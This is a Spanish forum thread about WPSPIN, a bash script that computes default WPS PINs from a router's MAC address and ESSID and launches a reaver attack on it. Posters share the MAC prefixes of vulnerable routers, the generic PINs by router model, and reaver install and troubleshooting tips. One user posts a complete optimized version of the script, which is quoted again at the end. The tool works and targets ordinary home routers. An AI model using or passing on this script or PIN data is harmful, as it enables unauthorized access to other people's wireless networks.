Ahora que esto esta hecho tengo ganas de hacerlo de nuevo desde cero porque es la primera vez que hago algo así y es un código "muy sucio".
Y quiero integrar mas cosas, entre otras los PINes genéricos de los cuales disponemos ( el 1653 del cual hablas por ejemplos) y hay mas cosas que se me ocurren. Así que "to be continued"  ;D
Cuando lo decía (to be continued) pensaba más en general en lo que pasa en el foro: "ayer WWA, el wpscrack y reaver modificados, hoy WPSPIN , mañana... ¿Quien sabe? Una lastima que el mundo se acabe el 21 de diciembre, no nos va a dar tiempo para todo  :)


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: notepad en Diciembre 12, 2012, 10:44:21 am
kcdtv aqui te dejo otro patron similar para añadirlo a la base datos  ;)

SSID : WLAN_2233
BBSID : 00:A0:26:11:22:33

11:22:33 hex (convertir a dec) = 1122867 dec (7digitos) + checksum = (8digitos) = 11228670

Haciendo un kitkat por las noches en vela continuo con ASL-26555  ;D Haber si antes de que acabe el mundo damos otro campanazo  ;)
Gracias a los datos enviados de MEGAHOM y eufra

Un salu2
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 11:01:48 am
Estarás soñando aún  ;D
Este routeur y mac son ya soportados y en la lista de los routeurs afectados.

@ tda
si, si, el terminal backtrack es algo tuneado y esto explica eso.  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 12, 2012, 11:25:25 am

Que yo sepa 00:A0:26 está soportada desde el principio:

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: notepad en Diciembre 12, 2012, 11:36:59 am
Que yo sepa 00:A0:26 está soportada desde el principio:

Si jeje, esque no lo vi en la lista de MAC´s soportadas  :P
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 12, 2012, 11:43:37 am


(http://picturestack.com/308/937/4FgCaptura2qN.jpg)


Si tienes marca / modelo se la pasas a kcdtv y se añade, nosotr@s no disponemos de esa información aún. Salu2
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 12:01:44 pm
No hace falta,

--------------------------------------------------
Fabricante >    Teldat
essid>         WLAN_XXXX
modelo>        iRouter1104-W
--------------------------------------------------

bssid soportados

00:A0:B6:

(http://i.imm.io/OQyA.png)

Diciembre 12, 2012, 14:54:48 pm
He puesto dos links, uno con la versión genérica, monocroma, que saldrá bien en backtrack   ;)

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 12, 2012, 15:01:41 pm
Citar
He puesto dos links,
Al ser editado el post no lo verán muchos.. a la tarde te comento un "trick" para determinados casos.


Añadida versión para Backtrack en el post principal
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 15:28:23 pm
 ;D  i want the tricks and the sweets ;D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Diciembre 12, 2012, 16:28:26 pm
kdctv buenas soy el mismo de la red FTE-xxxx que te dije not associated ty bueno ahora la señal esta en 68% y yo con ese por ciento saque claves de mis otros routers ono, y bueno lo malo que le pongo el pin y va del 90% y sigue subiendo a 91%, pero no me la tiene que dar de golpe la clave una vez he puesto el pin, pero es raro porque segun el reaver el pin que encontro es 12345670 y hace lo mismo 90%, 91% pero con este se queda en 99% con bucle, y luego puse el pin que me dio con el programa wpspin y hace eso 91%,92%
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 17:12:27 pm
wpspin solo genera el PIN el problema esta en el ataque con reaver.
¿Que versión de reaver tienes instalado? porque si es la 1,4 es normal que no te vaya, el opción -p no es funcional y hace "el puto búcle de la muerte"
68% es guapo para poner algo en el gestor de redes pero has de mirrar tu RXQ y tu PWR en tu ventana airodump-ng si quieres saber que pasa   ;)
Y cada routeur es un mundo... Los OnO son de los mas fáciles a atacar, con muy poca señal se rinden.
 Los Huawei se hacen bien pero necesitas una señal mejor que los netgaer de Ono
Si reaver te pone 90% y que no ves el M6 después el M4 es que el ataque no va bien y si haciendo el ataque normalmente se te mete en un bucle con 12345670 es que no estas atacando nada y todo se pierde en los aires.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Diciembre 12, 2012, 17:25:24 pm
wpspin solo genera el PIN el problema esta en el ataque con reaver.
¿Que versión de reaver tienes instalado? porque si es la 1,4 es normal que no te vaya, el opción -p no es funcional y hace "el puto búcle de la muerte"
68% es guapo para poner algo en el gestor de redes pero has de mirrar tu RXQ y tu PWR en tu ventana airodump-ng si quieres saber que pasa   ;)
Y cada routeur es un mundo... Los OnO son de los mas fáciles a atacar, con muy poca señal se rinden.
 Los Huawei se hacen bien pero necesitas una señal mejor que los netgaer de Ono
Si reaver te pone 90% y que no ves el M6 después el M4 es que el ataque no va bien y si haciendo el ataque normalmente se te mete en un bucle con 12345670 es que no estas atacando nada y todo se pierde en los aires.





si tengo esa version de reaver la 1.4, entonces que me recomiendas hacer?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 17:31:37 pm
poner la 1,3 o copiar y pegar el PIN en inflator (creo que lleva la 1.3 )
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Diciembre 12, 2012, 17:34:51 pm
poner la 1,3 o copiar y pegar el PIN en inflator (creo que lleva la 1.3 )

okey, me parece que el inflator lleva tambien el 1.4
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 17:54:36 pm
Entonces deberías des-instalar la 1.4 y instalar la 1,3

1. des-instalas

Situando te en tu directorio trunk/src en tu carpeta personal
desde tu navegador de archivos, haces click derecha en src y eleiges "abrir terminal aquí"
ahora se te abra una consola situada en la carpeta src.
escribes
Código: [Seleccionar]
./configure
Código: [Seleccionar]
sudo make distclean esto para quitar reaver 1.4

2.instalas

descargas reaver 1.3
lo descomprimes
habres la carpeta que obtinenes despues descomprimir se llama reaver 1.3, a dentro hay dos carpetas, "docs" y "src".

 y luego instalas, en la misma consola

Código: [Seleccionar]
./configure
Código: [Seleccionar]
make
Código: [Seleccionar]
sudo make install
NOTA- EDIT

INtalando la versión 113 de reaver 1.4 mediante svn, el opción p funcionna  :)

Código: [Seleccionar]
cd /tmp/; mkdir reaver
svn co http://reaver-wps.googlecode.com/svn/trunk/ reaver
 cd reaver/src
./configure
make
sudo make install
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Diciembre 12, 2012, 18:01:13 pm
Entonces deberías desinstalar la 1.4 y instalar la 1,3
descargas reaver 1.3
lo descomprimes
habres la carpeta que obtinenes despues descomprimir se llama reaver 1.3, a dentro hay dos carpetas, "docs" y "src".
Haces click derecha en src y eleiges "abrir terminal aquí"
ahora se te abra una consola situada en la carpeta src.
escribes
Código: [Seleccionar]
sudo make distclean esto para quitar reaver 1.4
 y luego instalas, en la misma consola
Código: [Seleccionar]
make
Código: [Seleccionar]
sudo make install
y para volver a poner la 1.4, te descargas la 1.4 y haces el mismo pero desde la carpeta descomprimida de reaver 1.4


Gracias por ayudarme
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Balastro en Diciembre 12, 2012, 20:07:02 pm
kcdtv, creo que tienes un pequeño bug en lo que es el "logo" de tu script.
 Te lo presento corregido en esta imagen a ver que te parece .

 (http://.us/a/img708/1127/lampi.png)

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 21:01:38 pm
No se a que te refieres, si lo mirras en gedit es normal que no te salga como será en la terminal
La versión backtrack sale así

(http://i.imm.io/OTEd.png)

No le veo nada raro...  ¿No te gustan las llamas?  ;D
Las puedes quitar es código libre  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Balastro en Diciembre 12, 2012, 21:24:36 pm
Yo, lo que creí es que la imagen de tu script era esta que ví en tu primer post...  :)

(http://.us/a/img22/157/dibujolampi.png)

Por eso la comparé con la que me ha salido en Backtrack... pensando que podía estar mal...je,je.
Bueno, no era mi intención desviarme del tema. La proxima vez intentaré tener más cuidado y más acierto, ya que sólo trataba de ayudar.

P.D. las llamas le quedan muy bién, el problema lo tengo yo que tengo que pasar por el oculista  8)

Sorry........


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: abuabdellah en Diciembre 12, 2012, 22:13:55 pm
creo qe te has olvidado del:
 ./configure
i despues va lo de make &&make install
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: acid_lemon en Diciembre 13, 2012, 00:12:29 am
Buenas, simplemente confirmar que sirve también para redes WLAN_XX y BSSID 00:A0:26  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 13, 2012, 10:53:08 am
acid_lemon

¿Puedes adjuntar por privado todos los datos posibles de ese router?

Hilo de recogida de datos centralizado

El BSSID 00:A0:26 que comentas era conocido de cara a WLAN_XXXX, pero no sabíamos que pudiera estar soportado como WLAN_XX por eso te solicito todos esos datos posibles.

Gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: martin en Diciembre 14, 2012, 10:08:46 am
Gracias por vuestro trabajo.
Queria preguntaros como debo hacer para poner el archivo descargado en el escritorio. Uso xiaopan y el navegador mozilla que lleva. Entro en opciones para ver la ruta de la descarga en mozilla pero no se que ruta debo poner para que la descarga del WPSPINS llegue al escritorio. Como veis estoy aún muy verde en linux.
Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 14, 2012, 21:22:09 pm
Se va a publicar una nueva versión de WPSPIN con unas  mejoras.
Dentro de poco los detalles...  ;)

(http://i.imm.io/P7ll.png)


(http://i.imm.io/P7nR.png)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: abuabdellah en Diciembre 14, 2012, 21:45:56 pm
Gracias por vuestro trabajo.
Queria preguntaros como debo hacer para poner el archivo descargado en el escritorio. Uso xiaopan y el navegador mozilla que lleva. Entro en opciones para ver la ruta de la descarga en mozilla pero no se que ruta debo poner para que la descarga del WPSPINS llegue al escritorio. Como veis estoy aún muy verde en linux.
Saludos
click derecho abrir carpeta de archivo, luego click derecho sobre el archivo. Y elegir extraeren escretorio. Esta  todo explicado en el primer post
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 14, 2012, 23:22:06 pm
Añadido soporte PIN genéricos descarga en post principal
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 17, 2012, 12:05:14 pm
Para simplificar la cosa, a partir de ahora dejo en fin de primer post la lista de bssid soportados a dentro de un texto con opción insertar codigó
Código: [Seleccionar]
solo tendréis que dar le a seleccionar y copiar-pegar lo para tener la lista actualizada. también a partir de ahora habrá una lista de bssid a parte del readme.txt en el paquete del programa para que podaís copiar y pegar lo fácilmente.
En un futuro mirare para que se pueda actualizar la lista automáticamente siendo conectado a Internet.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Balastro en Diciembre 17, 2012, 18:52:00 pm
Gracias kcdtv, como siempre haciéndonos la vida mucho más fácil.  :)

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jonhy_1988 en Diciembre 21, 2012, 00:02:38 am
He provado la aplicacion live cd 3.4 y se abre bien aunque con algunos errores de lectura pero no tantos como los que muestra el usuario que ha subido las fotos de backtrack, me inicia bien y el pin lo da bien pero a la hora de seleccionar la opcion 1 reaver me tira un error, sudo line comand 32 y no arranca reaver, he provado reaver 1.4 y con 13.3 tambien y sigue tirando el error,haber si sabes como editar ese fallilo kcdtv, seria lo suyo poderlo compilarlo 100% para ###Este_mensaje_y_usuario_seran_eliminados### u otros lives para los que no tenemos instalado linux.Gracias por el aportazo, mañana con tiempo subire una imagen del error haber que me puedes decir.Saludos....crack...
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 21, 2012, 01:34:03 am
Por lo de "###Este_mensaje_y_usuario_seran_eliminados### 3.4"  Échale un ojo a lo que esta escrito en rojo aqui > Normas 
Respecto a modificaciones y actualizaciones, no habrá nada hasta 2013, después la resaca (http://portalhacker.net/Smileys/classic/borrachos.gif)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jonhy_1988 en Diciembre 21, 2012, 11:39:46 am
Por lo de live cd 3.4"  Échale un ojo a lo que esta escrito en rojo aqui > Normas 
Respecto a modificaciones y actualizaciones, no habrá nada hasta 2013, después la resaca (http://portalhacker.net/Smileys/classic/borrachos.gif)

Pense que como habian expuesto sobre backtrack que tambien es un live cd se podria hablar sobra la otra live cd que yo indico,sino se puede escribir sobre la live que yo indico no volvere a escribir mas sobre ella, pero me queda la duda de porque si se puede sobre backtrack. En cuanto a las compilaciones de la aplicacion espero que llegue pronto 2013 haber si modificas algo.Felices fiestas y saludos...!!!

Este es el error que me tira tanto con reaver 1.4 como con reaver 1.3  line 432: sudo: command not found... ay solucion para ello?
[img width=540 height=294]http://img254..us/img254/7230/sinttuloxnq.png[/img]

Uploaded with .us
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: abuabdellah en Diciembre 24, 2012, 17:22:15 pm
 creo que tenes el wps desactivado ,si no, probalo con : sudo 1
espero que te serva.

nota :estas mac de jazztel no estan soporatadas i el patron no se sabe
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jonhy_1988 en Diciembre 25, 2012, 12:33:01 pm
creo que tenes el wps desactivado ,si no, probalo con : sudo 1
espero que te serva.

nota :estas mac de jazztel no estan soporatadas i el patron no se sabe

Es mi propio router y si tiene el wps activado, a traves de reaver si me da mi key pero con la aplicacion de kcdtv me tira ese error, y la mac de mi router si esta en la lista de pins de router genericos aunque el pin generico que me da no es el mio pero no me anda la seleccion 1 para lanzar reaver, seguire haciendo pruebas y probare con router de un compi que su mac y pin si son compatibles y estan en la lista de los que no son genericos.

[img width=540 height=159]http://img805..us/img805/9171/pruebasg.jpg[/img]

Uploaded with .us

MODELOS DE ROUTEURS CON PINES GENERICOS INTEGRADOS


-----------------------------------------------
Fagricante> OBSERVA TELECOM
essid>      WLAN_XXXX
modelo>     AW4062
-----------------------------------------------

bssid soportados

00:19:15



-----------------------------------------------
Fabricante> ZYXELL
essid>      WLAN_XXXX
modelo>     P-870HW-51A V2
-----------------------------------------------

bssid soportados

40:4A:03:


-----------------------------------------------
Fabricante> OEM Shenzhen Gongjin Electronics
essid>      WLAN_XXXX
modelo>     Encore ENDSL-4R5G
-----------------------------------------------

bssid soportados

F4:3E:61:
00:1F:A4:



-----------------------------------------------
Fabricante> Comtrend
essid>      JAZZTELL_XXXX
modelo>     AR-5387un
-----------------------------------------------

bssid soportados

38:72:C0:




-----------------------------------------------
Fabricante> ADB-Broadband
essid>      WLAN_XXXX
modelo>     PDG-A4001N
-----------------------------------------------

bssid soportados

30:39:F2:
DC:0B:1A:



-----------------------------------------------
Fabricante> Comtrend
essid>      WLAN_XXXX
modelo>     Gigabit 802.11n
-----------------------------------------------

bssid soportados

00:1A:2B:








Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jonhy_1988 en Diciembre 25, 2012, 20:41:27 pm
He provado tambien el wpsgenerator con wash integrado pero no
,reconose las de 3872c0 ni las de 001915------i 3039f2
les ponen como no soportadas.
Felizes fiestas a todos

A mi tampoco me reconoce el walsh esas mac pero si lanzo reaver funciona bien y obtengo el pin y la key.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: abuabdellah en Diciembre 26, 2012, 16:40:06 pm
A mi tampoco me reconoce el walsh esas mac pero si lanzo reaver funciona bien y obtengo el pin y la key.
ahora acabo de enterarme he probado reaver de kcdtv con adaptadores ralink no va el rtl 8187 va pero no se associa ,.i con rtl 8191 va de coña.
ahora si,  no sempre la version qe hay qe mirar tambien mira de probar   los adaptadores de red
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jonhy_1988 en Diciembre 26, 2012, 18:51:10 pm
ahora acabo de enterarme he probado reaver de kcdtv con adaptadores ralink no va el rtl 8187 va pero no se associa ,.i con rtl 8191 va de coña.
ahora si,  no sempre la version qe hay qe mirar tambien mira de probar   los adaptadores de red

La imagen que te he mostrado es con un alfa rtl8187 y si me asocia; una cosilla con que distro de linux has probado el wpspin de kcdtv?
para ir yo haciendo pruebas...Saludos...
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: r00tnull en Diciembre 28, 2012, 21:49:49 pm
Hola he hecho algunas optimizaciones, espero que les sirva :).
Código: [Seleccionar]
#!/bin/bash
# He respetado el nombre de las variables originales siempre que he podido.
# Al igual, he intentado respetar la mayoría de los textos, la intro la quite por que ocupaba mucho y además esta versión no es nada oficial.
# Changelog:  - Añadido opción -e a los reads para que sea interactivo, se pueda editar el texto que ponga el usuario, etc.
#             - Eliminación de algunas variables que no hacían falta.
#             - Simplificación de la función que genera el checksum.
#             - Simplificación de los `echo' que engloban varias lineas. Nota: no hace falta poner un echo por cada línea.
#             - Añadida verificación de MAC válida, y de ESSID FTE-XXXX, sin que se pueda bypassear.
#             - Agrupación de mac's para FTE en el `CASE'.
#             - Otros pequeños cambios.

echo "
+---------------------------------+
|  WPSPIN optimizado by r00tnull  |
|     para www.lampiweb.com       |
+---------------------------------+
|   Basada en WPSPIN de kcdtv.    |
| Respetando la licencia GPLv3.   |
| Usado algoritmo de ZaoChunsheng |
+---------------------------------+
"
read -ep "Introduce ESSID y pulsa <ENTER>: " ESSID     # Introducir el ESSID.
read -ep "Introduce BSSID y pulsa <ENTER>: " BSSID     # Intriducir el BSSID.

# Comprobamos que la MAC introducida es válida, 6 campos de 2 caracteres hexadecimales en cada uno, y que pueda acabar con espacios en blanco.
if [[ ! $BSSID =~ ^[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}[[:blank:]]*$ ]]; then
  echo "ERROR: La MAC que pusiste no tiene formato válido." >&2     # Mandamos mensaje de error por la salida de errores.
  exit 1     # Salimos con un estado 1 (error).
fi

# Función que genera el checksum. Algoritmo de ZaoChunsheng.
FUNC_CHECKSUM(){
    ACCUM=0
    while [ $PIN -ne 0 ]; do
      ACCUM=$((ACCUM += 3 * (PIN % 10)))
      PIN=$((PIN /= 10))
      ACCUM=$((ACCUM += PIN % 10))
      PIN=$((PIN /= 10))
    done
    CHECKSUM=$(((10 - ACCUM % 10) % 10))     # Por último se halla el valor para añadirlo al pin.
}

# Aquí comprobamos si el ESSID coincide con el patron FTE-XXXX. Las X deberán ser 4 caracteres hexadecimales.
if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]]; then    # Si coincide proceder.
  FINESSID=`echo $ESSID | cut -d'-' -f2`     # Cogemos los XXXX del ESSID.
  PAREMAC=`echo $BSSID | cut -d':' -f4`     # Cogemos el par 4º del BSSID.
  MACESSID=`echo $PAREMAC$FINESSID`     # Juntamos el 4º par con el final del ESSID.
  RAIZ=`printf "%d" $((0x$MACESSID%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
  STRING=$(($RAIZ+7))     # Sumamos el numero.
  PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
  FUNC_CHECKSUM     # Llamamos a la función.
  PINWPS4=`printf "%07d%d" $STRING $CHECKSUM`     # Guardamos el PIN en la variable.
  echo -e "\n     PIN WPS POR DEFECTO >>>>  ${PINWPS4}\n"     # Imprimimos el PIN.
  PIN4REAVER=$PINWPS4     # Lo guardamos en la variable, para pasarlo al programa.

else     # Si no coincide proceder a generar los 3 pins genéricos.
  declare -a PINWPS     # Declaramos un array donde guardaremos los 3 pins posibles.
  MAC=`echo $BSSID | awk -F':' '{ printf $4$5$6 }'`     # Separamos los últimos 3 pares del BSSID.
  n=1     # Contador para ir sumando valores del array.
  for i in 0 8 14; do     # Se ponen los casos posibles para sacar los pines, uno sin sumar nada y los otros sumando 8 y 14 respectivamente.
    STRING=`printf "%d" $((0x$MAC%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
    STRING=$(($STRING+$i))     # Sumamos el valor para hallar cada pin, para el primero 0, para el segundo 8 y para el tercero 14.
    PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
    FUNC_CHECKSUM     # Llamamos a la función.
    PINWPS[${n}]=`printf "%07d%d" $STRING $CHECKSUM`     # Vamos guardando los tres PIN's en el array, en las posiciones 1, 2 y 3.
    n=$[$n+1]
  done

  # Revisamos los 3 primeros pares de la MAC para ofrecer el resultado.
  CHECKBSSID=$(echo $BSSID | awk -F':' '{ printf $1$2$3 }')
  case $CHECKBSSID in
  04C06F|202BC1|285FDB|80B686|84A8E4|B4749F|BC7670|CC96A0)
  echo -e "\n    ¡ el ESSID por DEFECTO es FTE-XXXX !\n"
  echo "     3 PINes POSSIBLES  > ${PINWPS[1]}"     # Imprimimos los PIN's.
  echo "                        > ${PINWPS[2]}"
  echo -e "                        > ${PINWPS[3]}\n"
  PIN4REAVER=${PINWPS[1]}
  ;;
  001915)
  echo -e "\n              modelo routeur   : OBSERVA TELECOM, AW4062\n"
  echo -e "              PIN GENERICO  > 12345670\n"
  PIN4REAVER=12345670
  ;;
  404A03)
  echo -e "\n              modelo routeur   : ZYXELL P-870HW-51A V2\n"
  echo -e "              PIN GENERICO  >  11866428\n"
  PIN4REAVER=11866428
  ;;
  F43E61)
  echo -e "\n             modelo routeur  : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo "             PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001FA4)
  echo -e "\n            modelo routeur   : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo -e "            PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001A2B)
  echo -e "\n             modelo routeur   : Comtrend Gigabit 802.11n\n"
  echo "             PIN GENERICO  >  88478760\n"
  PIN4REAVER=88478760
  ;;
  3872C0)
  echo -e "\n             modelo routeur  : Comtrend AR-5387un\n"
  echo "             PIN GENERICO  >    18836486\n"
  PIN4REAVER=18836486
  ;;
  3039F2)
  echo -e "\n             modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "             PINes GENERICOs  >  16538061  "
  echo "                              >  18355604  "
  echo "                              >  88202907  "
  PIN4REAVER=16538061
  ;;
  DC0B1A)
  echo -e "\n            modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "            PINes GENERICOs  >  16538061  "
  echo "                             >  18355604  "
  echo "                             >  88202907  "
  PIN4REAVER=16538061
  ;;
  *)
  echo -e "\n          PIN WPS POR DEFECTO >>>>   ${PINWPS[1]} \n"
  PIN4REAVER=${PINWPS[1]}
  ;;
  esac
fi

echo "---------------------------------------------------------------------"
echo -e "\n[*] Elegir una opción.
   1 > Atacar con reaver (con mode monitor ya activado en mon0)
       El PIN empleado será $PIN4REAVER
   2 > Probar otra red
   3 > Salir
"
read -ep "Entrar número opción y darle a <ENTER> : " CHOISE

case $CHOISE in
1)
sudo reaver -b $BSSID -p $PIN4REAVER -i mon0 -t 2 -vv
;;
2)
./WPSPIN.sh
;;
*) echo "Saludos de kcdtv y r00tnull :p"
sleep 1
exit
;;
esac
Descarga del source: https://anonfiles.com/file/76dd437120fdb486f180b65ed1f459e3

kcdtv no me importaría colaborar con usted en este proyecto, me parece una buena iniciativa :).
Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 28, 2012, 22:20:30 pm

r00tnull, gracias por el aporte.. todo lo que sea aportar bien recibido es, como he dicho siempre el foro somos tod@s y tod@s debemos de encargarnos de que crezca.   ;)

kcdtv está fuera por las fiestas, a fin de año o a primeros regresará y os responderá a tod@s en este subforo, de momento pinty_102 que tampoco tiene mucho tiempo lo puede atender y vostros mismos los usuarios.

Un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ñanduti en Diciembre 29, 2012, 00:23:12 am
Hola he hecho algunas optimizaciones, espero que les sirva :).
Código: [Seleccionar]
#!/bin/bash
# He respetado el nombre de las variables originales siempre que he podido.
# Al igual, he intentado respetar la mayoría de los textos, la intro la quite por que ocupaba mucho y además esta versión no es nada oficial.
# Changelog:  - Añadido opción -e a los reads para que sea interactivo, se pueda editar el texto que ponga el usuario, etc.
#             - Eliminación de algunas variables que no hacían falta.
#             - Simplificación de la función que genera el checksum.
#             - Simplificación de los `echo' que engloban varias lineas. Nota: no hace falta poner un echo por cada línea.
#             - Añadida verificación de MAC válida, y de ESSID FTE-XXXX, sin que se pueda bypassear.
#             - Agrupación de mac's para FTE en el `CASE'.
#             - Otros pequeños cambios.

echo "
+---------------------------------+
|  WPSPIN optimizado by r00tnull  |
|     para www.lampiweb.com       |
+---------------------------------+
|   Basada en WPSPIN de kcdtv.    |
| Respetando la licencia GPLv3.   |
| Usado algoritmo de ZaoChunsheng |
+---------------------------------+
"
read -ep "Introduce ESSID y pulsa <ENTER>: " ESSID     # Introducir el ESSID.
read -ep "Introduce BSSID y pulsa <ENTER>: " BSSID     # Intriducir el BSSID.

# Comprobamos que la MAC introducida es válida, 6 campos de 2 caracteres hexadecimales en cada uno, y que pueda acabar con espacios en blanco.
if [[ ! $BSSID =~ ^[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}[[:blank:]]*$ ]]; then
  echo "ERROR: La MAC que pusiste no tiene formato válido." >&2     # Mandamos mensaje de error por la salida de errores.
  exit 1     # Salimos con un estado 1 (error).
fi

# Función que genera el checksum. Algoritmo de ZaoChunsheng.
FUNC_CHECKSUM(){
    ACCUM=0
    while [ $PIN -ne 0 ]; do
      ACCUM=$((ACCUM += 3 * (PIN % 10)))
      PIN=$((PIN /= 10))
      ACCUM=$((ACCUM += PIN % 10))
      PIN=$((PIN /= 10))
    done
    CHECKSUM=$(((10 - ACCUM % 10) % 10))     # Por último se halla el valor para añadirlo al pin.
}

# Aquí comprobamos si el ESSID coincide con el patron FTE-XXXX. Las X deberán ser 4 caracteres hexadecimales.
if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]]; then    # Si coincide proceder.
  FINESSID=`echo $ESSID | cut -d'-' -f2`     # Cogemos los XXXX del ESSID.
  PAREMAC=`echo $BSSID | cut -d':' -f4`     # Cogemos el par 4º del BSSID.
  MACESSID=`echo $PAREMAC$FINESSID`     # Juntamos el 4º par con el final del ESSID.
  RAIZ=`printf "%d" $((0x$MACESSID%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
  STRING=$(($RAIZ+7))     # Sumamos el numero.
  PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
  FUNC_CHECKSUM     # Llamamos a la función.
  PINWPS4=`printf "%07d%d" $STRING $CHECKSUM`     # Guardamos el PIN en la variable.
  echo -e "\n     PIN WPS POR DEFECTO >>>>  ${PINWPS4}\n"     # Imprimimos el PIN.
  PIN4REAVER=$PINWPS4     # Lo guardamos en la variable, para pasarlo al programa.

else     # Si no coincide proceder a generar los 3 pins genéricos.
  declare -a PINWPS     # Declaramos un array donde guardaremos los 3 pins posibles.
  MAC=`echo $BSSID | awk -F':' '{ printf $4$5$6 }'`     # Separamos los últimos 3 pares del BSSID.
  n=1     # Contador para ir sumando valores del array.
  for i in 0 8 14; do     # Se ponen los casos posibles para sacar los pines, uno sin sumar nada y los otros sumando 8 y 14 respectivamente.
    STRING=`printf "%d" $((0x$MAC%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
    STRING=$(($STRING+$i))     # Sumamos el valor para hallar cada pin, para el primero 0, para el segundo 8 y para el tercero 14.
    PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
    FUNC_CHECKSUM     # Llamamos a la función.
    PINWPS[${n}]=`printf "%07d%d" $STRING $CHECKSUM`     # Vamos guardando los tres PIN's en el array, en las posiciones 1, 2 y 3.
    n=$[$n+1]
  done

  # Revisamos los 3 primeros pares de la MAC para ofrecer el resultado.
  CHECKBSSID=$(echo $BSSID | awk -F':' '{ printf $1$2$3 }')
  case $CHECKBSSID in
  04C06F|202BC1|285FDB|80B686|84A8E4|B4749F|BC7670|CC96A0)
  echo -e "\n    ¡ el ESSID por DEFECTO es FTE-XXXX !\n"
  echo "     3 PINes POSSIBLES  > ${PINWPS[1]}"     # Imprimimos los PIN's.
  echo "                        > ${PINWPS[2]}"
  echo -e "                        > ${PINWPS[3]}\n"
